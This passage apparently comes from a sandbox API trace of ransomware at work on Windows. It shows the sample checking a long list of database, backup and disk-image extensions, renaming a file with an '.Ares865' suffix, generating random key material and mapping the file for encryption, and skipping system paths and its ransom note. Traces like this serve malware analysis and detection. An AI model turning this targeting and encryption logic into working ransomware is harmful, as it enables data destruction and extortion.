lpString2="cdb") returned -1 [0076.597] lstrlenW (lpString="ckp") returned 3 [0076.597] lstrcmpiW (lpString1="cab", lpString2="ckp") returned -1 [0076.597] lstrlenW (lpString="cma") returned 3 [0076.597] lstrcmpiW (lpString1="cab", lpString2="cma") returned -1 [0076.597] lstrlenW (lpString="cpd") returned 3 [0076.597] lstrcmpiW (lpString1="cab", lpString2="cpd") returned -1 [0076.597] lstrlenW (lpString="dacpac") returned 6 [0076.597] lstrcmpiW (lpString1="b1.cab", lpString2="dacpac") returned -1 [0076.597] lstrlenW (lpString="dad") returned 3 [0076.597] lstrcmpiW (lpString1="cab", lpString2="dad") returned -1 [0076.597] lstrlenW (lpString="dadiagrams") returned 10 [0076.597] lstrlenW (lpString="daschema") returned 8 [0076.597] lstrlenW (lpString="db-journal") returned 10 [0076.597] lstrlenW (lpString="db-shm") returned 6 [0076.597] lstrcmpiW (lpString1="b1.cab", lpString2="db-shm") returned -1 [0076.597] lstrlenW (lpString="db-wal") returned 6 [0076.597] lstrcmpiW (lpString1="b1.cab", lpString2="db-wal") returned -1 [0076.597] lstrlenW (lpString="dbc") returned 3 [0076.597] lstrcmpiW (lpString1="cab", lpString2="dbc") returned -1 [0076.597] lstrlenW (lpString="dbs") returned 3 [0076.597] lstrcmpiW (lpString1="cab", lpString2="dbs") returned -1 [0076.598] lstrlenW (lpString="dbt") returned 3 [0076.598] lstrcmpiW (lpString1="cab", lpString2="dbt") returned -1 [0076.598] lstrlenW (lpString="dbv") returned 3 [0076.598] lstrcmpiW (lpString1="cab", lpString2="dbv") returned -1 [0076.598] lstrlenW (lpString="dbx") returned 3 [0076.598] lstrcmpiW (lpString1="cab", lpString2="dbx") returned -1 [0076.598] lstrlenW (lpString="dcb") returned 3 [0076.598] lstrcmpiW (lpString1="cab", lpString2="dcb") returned -1 [0076.598] lstrlenW (lpString="dct") returned 3 [0076.598] lstrcmpiW (lpString1="cab", lpString2="dct") returned -1 [0076.598] lstrlenW (lpString="dcx") returned 3 [0076.598] lstrcmpiW (lpString1="cab", lpString2="dcx") returned -1 [0076.598] lstrlenW (lpString="ddl") returned 3 [0076.598] lstrcmpiW (lpString1="cab", lpString2="ddl") returned -1 [0076.598] lstrlenW (lpString="dlis") returned 4 [0076.598] lstrcmpiW (lpString1=".cab", lpString2="dlis") returned -1 [0076.598] lstrlenW (lpString="dp1") returned 3 [0076.598] lstrcmpiW (lpString1="cab", lpString2="dp1") returned -1 [0076.598] lstrlenW (lpString="dqy") returned 3 [0076.598] lstrcmpiW (lpString1="cab", lpString2="dqy") returned -1 [0076.598] lstrlenW (lpString="dsk") returned 3 [0076.598] lstrcmpiW (lpString1="cab", lpString2="dsk") returned -1 [0076.598] lstrlenW (lpString="dsn") returned 3 [0076.598] lstrcmpiW (lpString1="cab", lpString2="dsn") returned -1 [0076.598] lstrlenW (lpString="dtsx") returned 4 [0076.598] lstrcmpiW (lpString1=".cab", lpString2="dtsx") returned -1 [0076.598] lstrlenW (lpString="dxl") returned 3 [0076.598] lstrcmpiW (lpString1="cab", lpString2="dxl") returned -1 [0076.598] lstrlenW (lpString="eco") returned 3 [0076.598] lstrcmpiW (lpString1="cab", lpString2="eco") returned -1 [0076.598] lstrlenW (lpString="ecx") returned 3 [0076.598] lstrcmpiW (lpString1="cab", lpString2="ecx") returned -1 [0076.598] lstrlenW (lpString="edb") returned 3 [0076.598] lstrcmpiW (lpString1="cab", lpString2="edb") returned -1 [0076.598] lstrlenW (lpString="epim") returned 4 [0076.598] lstrcmpiW (lpString1=".cab", lpString2="epim") returned -1 [0076.598] lstrlenW (lpString="fcd") returned 3 [0076.598] lstrcmpiW (lpString1="cab", lpString2="fcd") returned -1 [0076.599] lstrlenW (lpString="fdb") returned 3 [0076.599] lstrcmpiW (lpString1="cab", lpString2="fdb") returned -1 [0076.599] lstrlenW (lpString="fic") returned 3 [0076.599] lstrcmpiW (lpString1="cab", lpString2="fic") returned -1 [0076.599] lstrlenW (lpString="flexolibrary") returned 12 [0076.599] lstrlenW (lpString="fm5") returned 3 [0076.599] lstrcmpiW (lpString1="cab", lpString2="fm5") returned -1 [0076.599] lstrlenW (lpString="fmp") returned 3 [0076.599] lstrcmpiW (lpString1="cab", lpString2="fmp") returned -1 [0076.599] lstrlenW (lpString="fmp12") returned 5 [0076.599] lstrcmpiW (lpString1="1.cab", lpString2="fmp12") returned -1 [0076.599] lstrlenW (lpString="fmpsl") returned 5 [0076.599] lstrcmpiW (lpString1="1.cab", lpString2="fmpsl") returned -1 [0076.599] lstrlenW (lpString="fol") returned 3 [0076.599] lstrcmpiW (lpString1="cab", lpString2="fol") returned -1 [0076.599] lstrlenW (lpString="fp3") returned 3 [0076.599] lstrcmpiW (lpString1="cab", lpString2="fp3") returned -1 [0076.599] lstrlenW (lpString="fp4") returned 3 [0076.599] lstrcmpiW (lpString1="cab", lpString2="fp4") returned -1 [0076.599] lstrlenW (lpString="fp5") returned 3 [0076.599] lstrcmpiW (lpString1="cab", lpString2="fp5") returned -1 [0076.599] lstrlenW (lpString="fp7") returned 3 [0076.599] lstrcmpiW (lpString1="cab", lpString2="fp7") returned -1 [0076.599] lstrlenW (lpString="fpt") returned 3 [0076.599] lstrcmpiW (lpString1="cab", lpString2="fpt") returned -1 [0076.599] lstrlenW (lpString="frm") returned 3 [0076.599] lstrcmpiW (lpString1="cab", lpString2="frm") returned -1 [0076.599] lstrlenW (lpString="gdb") returned 3 [0076.599] lstrcmpiW (lpString1="cab", lpString2="gdb") returned -1 [0076.599] lstrlenW (lpString="gdb") returned 3 [0076.599] lstrcmpiW (lpString1="cab", lpString2="gdb") returned -1 [0076.599] lstrlenW (lpString="grdb") returned 4 [0076.599] lstrcmpiW (lpString1=".cab", lpString2="grdb") returned -1 [0076.599] lstrlenW (lpString="gwi") returned 3 [0076.599] lstrcmpiW (lpString1="cab", lpString2="gwi") returned -1 [0076.599] lstrlenW (lpString="hdb") returned 3 [0076.599] lstrcmpiW (lpString1="cab", lpString2="hdb") returned -1 [0076.599] lstrlenW (lpString="his") returned 3 [0076.600] lstrcmpiW (lpString1="cab", lpString2="his") returned -1 [0076.600] lstrlenW (lpString="ib") returned 2 [0076.600] lstrcmpiW (lpString1="ab", lpString2="ib") returned -1 [0076.600] lstrlenW (lpString="idb") returned 3 [0076.600] lstrcmpiW (lpString1="cab", lpString2="idb") returned -1 [0076.600] lstrlenW (lpString="ihx") returned 3 [0076.600] lstrcmpiW (lpString1="cab", lpString2="ihx") returned -1 [0076.600] lstrlenW (lpString="itdb") returned 4 [0076.600] lstrcmpiW (lpString1=".cab", lpString2="itdb") returned -1 [0076.600] lstrlenW (lpString="itw") returned 3 [0076.600] lstrcmpiW (lpString1="cab", lpString2="itw") returned -1 [0076.600] lstrlenW (lpString="jet") returned 3 [0076.600] lstrcmpiW (lpString1="cab", lpString2="jet") returned -1 [0076.600] lstrlenW (lpString="jtx") returned 3 [0076.600] lstrcmpiW (lpString1="cab", lpString2="jtx") returned -1 [0076.600] lstrlenW (lpString="kdb") returned 3 [0076.600] lstrcmpiW (lpString1="cab", lpString2="kdb") returned -1 [0076.600] lstrlenW (lpString="kexi") returned 4 [0076.600] lstrcmpiW (lpString1=".cab", lpString2="kexi") returned -1 [0076.600] lstrlenW (lpString="kexic") returned 5 [0076.600] lstrcmpiW (lpString1="1.cab", lpString2="kexic") returned -1 [0076.600] lstrlenW (lpString="kexis") returned 5 [0076.600] lstrcmpiW (lpString1="1.cab", lpString2="kexis") returned -1 [0076.600] lstrlenW (lpString="lgc") returned 3 [0076.600] lstrcmpiW (lpString1="cab", lpString2="lgc") returned -1 [0076.600] lstrlenW (lpString="lwx") returned 3 [0076.600] lstrcmpiW (lpString1="cab", lpString2="lwx") returned -1 [0076.600] lstrlenW (lpString="maf") returned 3 [0076.600] lstrcmpiW (lpString1="cab", lpString2="maf") returned -1 [0076.600] lstrlenW (lpString="maq") returned 3 [0076.600] lstrcmpiW (lpString1="cab", lpString2="maq") returned -1 [0076.600] lstrlenW (lpString="mar") returned 3 [0076.600] lstrcmpiW (lpString1="cab", lpString2="mar") returned -1 [0076.600] lstrlenW (lpString="marshal") returned 7 [0076.600] lstrcmpiW (lpString1="ab1.cab", lpString2="marshal") returned -1 [0076.600] lstrlenW (lpString="mas") returned 3 [0076.600] lstrcmpiW (lpString1="cab", lpString2="mas") returned -1 [0076.600] lstrlenW (lpString="mav") returned 3 [0076.601] lstrcmpiW (lpString1="cab", lpString2="mav") returned -1 [0076.601] lstrlenW (lpString="maw") returned 3 [0076.601] lstrcmpiW (lpString1="cab", lpString2="maw") returned -1 [0076.601] lstrlenW (lpString="mdbhtml") returned 7 [0076.601] lstrcmpiW (lpString1="ab1.cab", lpString2="mdbhtml") returned -1 [0076.601] lstrlenW (lpString="mdn") returned 3 [0076.601] lstrcmpiW (lpString1="cab", lpString2="mdn") returned -1 [0076.601] lstrlenW (lpString="mdt") returned 3 [0076.601] lstrcmpiW (lpString1="cab", lpString2="mdt") returned -1 [0076.601] lstrlenW (lpString="mfd") returned 3 [0076.601] lstrcmpiW (lpString1="cab", lpString2="mfd") returned -1 [0076.601] lstrlenW (lpString="mpd") returned 3 [0076.601] lstrcmpiW (lpString1="cab", lpString2="mpd") returned -1 [0076.601] lstrlenW (lpString="mrg") returned 3 [0076.601] lstrcmpiW (lpString1="cab", lpString2="mrg") returned -1 [0076.601] lstrlenW (lpString="mud") returned 3 [0076.601] lstrcmpiW (lpString1="cab", lpString2="mud") returned -1 [0076.601] lstrlenW (lpString="mwb") returned 3 [0076.601] lstrcmpiW (lpString1="cab", lpString2="mwb") returned -1 [0076.601] lstrlenW (lpString="myd") returned 3 [0076.601] lstrcmpiW (lpString1="cab", lpString2="myd") returned -1 [0076.601] lstrlenW (lpString="ndf") returned 3 [0076.601] lstrcmpiW (lpString1="cab", lpString2="ndf") returned -1 [0076.601] lstrlenW (lpString="nnt") returned 3 [0076.601] lstrcmpiW (lpString1="cab", lpString2="nnt") returned -1 [0076.601] lstrlenW (lpString="nrmlib") returned 6 [0076.601] lstrcmpiW (lpString1="b1.cab", lpString2="nrmlib") returned -1 [0076.601] lstrlenW (lpString="ns2") returned 3 [0076.601] lstrcmpiW (lpString1="cab", lpString2="ns2") returned -1 [0076.601] lstrlenW (lpString="ns3") returned 3 [0076.601] lstrcmpiW (lpString1="cab", lpString2="ns3") returned -1 [0076.601] lstrlenW (lpString="ns4") returned 3 [0076.601] lstrcmpiW (lpString1="cab", lpString2="ns4") returned -1 [0076.601] lstrlenW (lpString="nsf") returned 3 [0076.601] lstrcmpiW (lpString1="cab", lpString2="nsf") returned -1 [0076.601] lstrlenW (lpString="nv") returned 2 [0076.601] lstrcmpiW (lpString1="ab", lpString2="nv") returned -1 [0076.601] lstrlenW (lpString="nv2") returned 3 [0076.601] lstrcmpiW (lpString1="cab", lpString2="nv2") returned -1 [0076.602] lstrlenW (lpString="nwdb") returned 4 [0076.602] lstrcmpiW (lpString1=".cab", lpString2="nwdb") returned -1 [0076.602] lstrlenW (lpString="nyf") returned 3 [0076.602] lstrcmpiW (lpString1="cab", lpString2="nyf") returned -1 [0076.602] lstrlenW (lpString="odb") returned 3 [0076.602] lstrcmpiW (lpString1="cab", lpString2="odb") returned -1 [0076.602] lstrlenW (lpString="odb") returned 3 [0076.602] lstrcmpiW (lpString1="cab", lpString2="odb") returned -1 [0076.602] lstrlenW (lpString="oqy") returned 3 [0076.602] lstrcmpiW (lpString1="cab", lpString2="oqy") returned -1 [0076.602] lstrlenW (lpString="ora") returned 3 [0076.602] lstrcmpiW (lpString1="cab", lpString2="ora") returned -1 [0076.602] lstrlenW (lpString="orx") returned 3 [0076.602] lstrcmpiW (lpString1="cab", lpString2="orx") returned -1 [0076.602] lstrlenW (lpString="owc") returned 3 [0076.602] lstrcmpiW (lpString1="cab", lpString2="owc") returned -1 [0076.602] lstrlenW (lpString="p96") returned 3 [0076.602] lstrcmpiW (lpString1="cab", lpString2="p96") returned -1 [0076.602] lstrlenW (lpString="p97") returned 3 [0076.602] lstrcmpiW (lpString1="cab", lpString2="p97") returned -1 [0076.602] lstrlenW (lpString="pan") returned 3 [0076.602] lstrcmpiW (lpString1="cab", lpString2="pan") returned -1 [0076.602] lstrlenW (lpString="pdb") returned 3 [0076.602] lstrcmpiW (lpString1="cab", lpString2="pdb") returned -1 [0076.602] lstrlenW (lpString="pdm") returned 3 [0076.602] lstrcmpiW (lpString1="cab", lpString2="pdm") returned -1 [0076.602] lstrlenW (lpString="pnz") returned 3 [0076.602] lstrcmpiW (lpString1="cab", lpString2="pnz") returned -1 [0076.602] lstrlenW (lpString="qry") returned 3 [0076.602] lstrcmpiW (lpString1="cab", lpString2="qry") returned -1 [0076.602] lstrlenW (lpString="qvd") returned 3 [0076.602] lstrcmpiW (lpString1="cab", lpString2="qvd") returned -1 [0076.602] lstrlenW (lpString="rbf") returned 3 [0076.602] lstrcmpiW (lpString1="cab", lpString2="rbf") returned -1 [0076.602] lstrlenW (lpString="rctd") returned 4 [0076.602] lstrcmpiW (lpString1=".cab", lpString2="rctd") returned -1 [0076.603] lstrlenW (lpString="rod") returned 3 [0076.603] lstrcmpiW (lpString1="cab", lpString2="rod") returned -1 [0076.603] lstrlenW (lpString="rodx") returned 4 [0076.603] lstrcmpiW (lpString1=".cab", lpString2="rodx") returned -1 [0076.603] lstrlenW (lpString="rpd") returned 3 [0076.603] lstrcmpiW (lpString1="cab", lpString2="rpd") returned -1 [0076.603] lstrlenW (lpString="rsd") returned 3 [0076.603] lstrcmpiW (lpString1="cab", lpString2="rsd") returned -1 [0076.603] lstrlenW (lpString="sas7bdat") returned 8 [0076.603] lstrlenW (lpString="sbf") returned 3 [0076.603] lstrcmpiW (lpString1="cab", lpString2="sbf") returned -1 [0076.603] lstrlenW (lpString="scx") returned 3 [0076.603] lstrcmpiW (lpString1="cab", lpString2="scx") returned -1 [0076.603] lstrlenW (lpString="sdb") returned 3 [0076.603] lstrcmpiW (lpString1="cab", lpString2="sdb") returned -1 [0076.603] lstrlenW (lpString="sdc") returned 3 [0076.603] lstrcmpiW (lpString1="cab", lpString2="sdc") returned -1 [0076.603] lstrlenW (lpString="sdf") returned 3 [0076.603] lstrcmpiW (lpString1="cab", lpString2="sdf") returned -1 [0076.603] lstrlenW (lpString="sis") returned 3 [0076.603] lstrcmpiW (lpString1="cab", lpString2="sis") returned -1 [0076.603] lstrlenW (lpString="spq") returned 3 [0076.603] lstrcmpiW (lpString1="cab", lpString2="spq") returned -1 [0076.603] lstrlenW (lpString="te") returned 2 [0076.603] lstrcmpiW (lpString1="ab", lpString2="te") returned -1 [0076.603] lstrlenW (lpString="teacher") returned 7 [0076.603] lstrcmpiW (lpString1="ab1.cab", lpString2="teacher") returned -1 [0076.603] lstrlenW (lpString="tmd") returned 3 [0076.603] lstrcmpiW (lpString1="cab", lpString2="tmd") returned -1 [0076.603] lstrlenW (lpString="tps") returned 3 [0076.603] lstrcmpiW (lpString1="cab", lpString2="tps") returned -1 [0076.603] lstrlenW (lpString="trc") returned 3 [0076.603] lstrcmpiW (lpString1="cab", lpString2="trc") returned -1 [0076.603] lstrlenW (lpString="trc") returned 3 [0076.603] lstrcmpiW (lpString1="cab", lpString2="trc") returned -1 [0076.603] lstrlenW (lpString="trm") returned 3 [0076.603] lstrcmpiW (lpString1="cab", lpString2="trm") returned -1 [0076.603] lstrlenW (lpString="udb") returned 3 [0076.604] lstrcmpiW (lpString1="cab", lpString2="udb") returned -1 [0076.604] lstrlenW (lpString="udl") returned 3 [0076.604] lstrcmpiW (lpString1="cab", lpString2="udl") returned -1 [0076.604] lstrlenW (lpString="usr") returned 3 [0076.604] lstrcmpiW (lpString1="cab", lpString2="usr") returned -1 [0076.604] lstrlenW (lpString="v12") returned 3 [0076.604] lstrcmpiW (lpString1="cab", lpString2="v12") returned -1 [0076.604] lstrlenW (lpString="vis") returned 3 [0076.604] lstrcmpiW (lpString1="cab", lpString2="vis") returned -1 [0076.604] lstrlenW (lpString="vpd") returned 3 [0076.604] lstrcmpiW (lpString1="cab", lpString2="vpd") returned -1 [0076.604] lstrlenW (lpString="vvv") returned 3 [0076.604] lstrcmpiW (lpString1="cab", lpString2="vvv") returned -1 [0076.604] lstrlenW (lpString="wdb") returned 3 [0076.604] lstrcmpiW (lpString1="cab", lpString2="wdb") returned -1 [0076.604] lstrlenW (lpString="wmdb") returned 4 [0076.604] lstrcmpiW (lpString1=".cab", lpString2="wmdb") returned -1 [0076.604] lstrlenW (lpString="wrk") returned 3 [0076.604] lstrcmpiW (lpString1="cab", lpString2="wrk") returned -1 [0076.604] lstrlenW (lpString="xdb") returned 3 [0076.604] lstrcmpiW (lpString1="cab", lpString2="xdb") returned -1 [0076.604] lstrlenW (lpString="xld") returned 3 [0076.604] lstrcmpiW (lpString1="cab", lpString2="xld") returned -1 [0076.604] lstrlenW (lpString="xmlff") returned 5 [0076.604] lstrcmpiW (lpString1="1.cab", lpString2="xmlff") returned -1 [0076.604] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.Ares865") returned 134 [0076.604] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.Ares865" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab.ares865"), dwFlags=0x1) returned 1 [0076.605] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.Ares865" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0076.605] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5588256) returned 1 [0076.605] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0076.606] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0076.606] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0076.606] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0076.606] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0076.606] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0076.607] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x554820, lpName=0x0) returned 0x154 [0076.609] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x400000, dwNumberOfBytesToMap=0x154820) returned 0x3450000 [0077.050] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0077.052] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0077.052] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0077.054] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0077.059] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0077.059] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0077.059] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0077.059] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0077.064] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0077.064] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0077.075] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0077.076] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0077.076] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0077.076] UnmapViewOfFile (lpBaseAddress=0x3450000) returned 1 [0077.089] CloseHandle (hObject=0x154) returned 1 [0077.089] CloseHandle (hObject=0x12c) returned 1 [0077.089] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d31c0 | out: hHeap=0x2b0000) returned 1 [0077.089] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0077.089] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0077.108] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c1e5280, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c1e5280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0077.108] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0077.109] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a38c100, ftCreationTime.dwHighDateTime=0x1cf3dd2, ftLastAccessTime.dwLowDateTime=0x7a38c100, ftLastAccessTime.dwHighDateTime=0x1cf3dd2, ftLastWriteTime.dwLowDateTime=0x7a38c100, ftLastWriteTime.dwHighDateTime=0x1cf3dd2, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vc_runtimeAdditional_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0077.109] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0077.109] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="aoldtz.exe") returned 1 [0077.109] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2=".") returned 1 [0077.109] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="..") returned 1 [0077.109] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="windows") returned -1 [0077.111] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="bootmgr") returned 1 [0077.111] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="temp") returned 1 [0077.113] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="pagefile.sys") returned 1 [0077.113] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="boot") returned 1 [0077.113] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="ids.txt") returned 1 [0077.114] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="ntuser.dat") returned 1 [0077.114] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="perflogs") returned 1 [0077.114] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="MSBuild") returned 1 [0077.114] lstrlenW (lpString="vc_runtimeAdditional_x64.msi") returned 28 [0077.115] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned 126 [0077.115] lstrcpyW (in: lpString1=0x2cce4ec, lpString2="vc_runtimeAdditional_x64.msi" | out: lpString1="vc_runtimeAdditional_x64.msi") returned="vc_runtimeAdditional_x64.msi" [0077.118] lstrlenW (lpString="vc_runtimeAdditional_x64.msi") returned 28 [0077.118] lstrlenW (lpString="Ares865") returned 7 [0077.118] lstrcmpiW (lpString1="x64.msi", lpString2="Ares865") returned 1 [0077.119] lstrlenW (lpString=".dll") returned 4 [0077.119] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2=".dll") returned 1 [0077.120] lstrlenW (lpString=".lnk") returned 4 [0077.120] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2=".lnk") returned 1 [0077.120] lstrlenW (lpString=".ini") returned 4 [0077.120] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2=".ini") returned 1 [0077.120] lstrlenW (lpString=".sys") returned 4 [0077.120] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2=".sys") returned 1 [0077.120] lstrlenW (lpString="vc_runtimeAdditional_x64.msi") returned 28 [0077.129] lstrlenW (lpString="bak") returned 3 [0077.129] lstrcmpiW (lpString1="msi", lpString2="bak") returned 1 [0077.129] lstrlenW (lpString="ba_") returned 3 [0077.130] lstrcmpiW (lpString1="msi", lpString2="ba_") returned 1 [0077.130] lstrlenW (lpString="dbb") returned 3 [0077.130] lstrcmpiW (lpString1="msi", lpString2="dbb") returned 1 [0077.130] lstrlenW (lpString="vmdk") returned 4 [0077.130] lstrcmpiW (lpString1=".msi", lpString2="vmdk") returned -1 [0077.130] lstrlenW (lpString="rar") returned 3 [0077.136] lstrcmpiW (lpString1="msi", lpString2="rar") returned -1 [0077.136] lstrlenW (lpString="zip") returned 3 [0077.136] lstrcmpiW (lpString1="msi", lpString2="zip") returned -1 [0077.138] lstrlenW (lpString="tgz") returned 3 [0077.138] lstrcmpiW (lpString1="msi", lpString2="tgz") returned -1 [0077.138] lstrlenW (lpString="vbox") returned 4 [0077.139] lstrcmpiW (lpString1=".msi", lpString2="vbox") returned -1 [0077.139] lstrlenW (lpString="vdi") returned 3 [0077.139] lstrcmpiW (lpString1="msi", lpString2="vdi") returned -1 [0077.139] lstrlenW (lpString="vhd") returned 3 [0077.140] lstrcmpiW (lpString1="msi", lpString2="vhd") returned -1 [0077.140] lstrlenW (lpString="vhdx") returned 4 [0077.140] lstrcmpiW (lpString1=".msi", lpString2="vhdx") returned -1 [0077.140] lstrlenW (lpString="avhd") returned 4 [0077.140] lstrcmpiW (lpString1=".msi", lpString2="avhd") returned -1 [0077.140] lstrlenW (lpString="db") returned 2 [0077.140] lstrcmpiW (lpString1="si", lpString2="db") returned 1 [0077.140] lstrlenW (lpString="db2") returned 3 [0077.148] lstrcmpiW (lpString1="msi", lpString2="db2") returned 1 [0077.148] lstrlenW (lpString="db3") returned 3 [0077.148] lstrcmpiW (lpString1="msi", lpString2="db3") returned 1 [0077.149] lstrlenW (lpString="dbf") returned 3 [0077.149] lstrcmpiW (lpString1="msi", lpString2="dbf") returned 1 [0077.156] lstrlenW (lpString="mdf") returned 3 [0077.156] lstrcmpiW (lpString1="msi", lpString2="mdf") returned 1 [0077.158] lstrlenW (lpString="mdb") returned 3 [0077.158] lstrcmpiW (lpString1="msi", lpString2="mdb") returned 1 [0077.158] lstrlenW (lpString="sql") returned 3 [0077.158] lstrcmpiW (lpString1="msi", lpString2="sql") returned -1 [0077.158] lstrlenW (lpString="sqlite") returned 6 [0077.158] lstrcmpiW (lpString1="64.msi", lpString2="sqlite") returned -1 [0077.158] lstrlenW (lpString="sqlite3") returned 7 [0077.158] lstrcmpiW (lpString1="x64.msi", lpString2="sqlite3") returned 1 [0077.158] lstrlenW (lpString="sqlitedb") returned 8 [0077.159] lstrcmpiW (lpString1="_x64.msi", lpString2="sqlitedb") returned -1 [0077.159] lstrlenW (lpString="xml") returned 3 [0077.159] lstrcmpiW (lpString1="msi", lpString2="xml") returned -1 [0077.160] lstrlenW (lpString="$er") returned 3 [0077.160] lstrcmpiW (lpString1="msi", lpString2="$er") returned 1 [0077.160] lstrlenW (lpString="4dd") returned 3 [0077.160] lstrcmpiW (lpString1="msi", lpString2="4dd") returned 1 [0077.160] lstrlenW (lpString="4dl") returned 3 [0077.160] lstrcmpiW (lpString1="msi", lpString2="4dl") 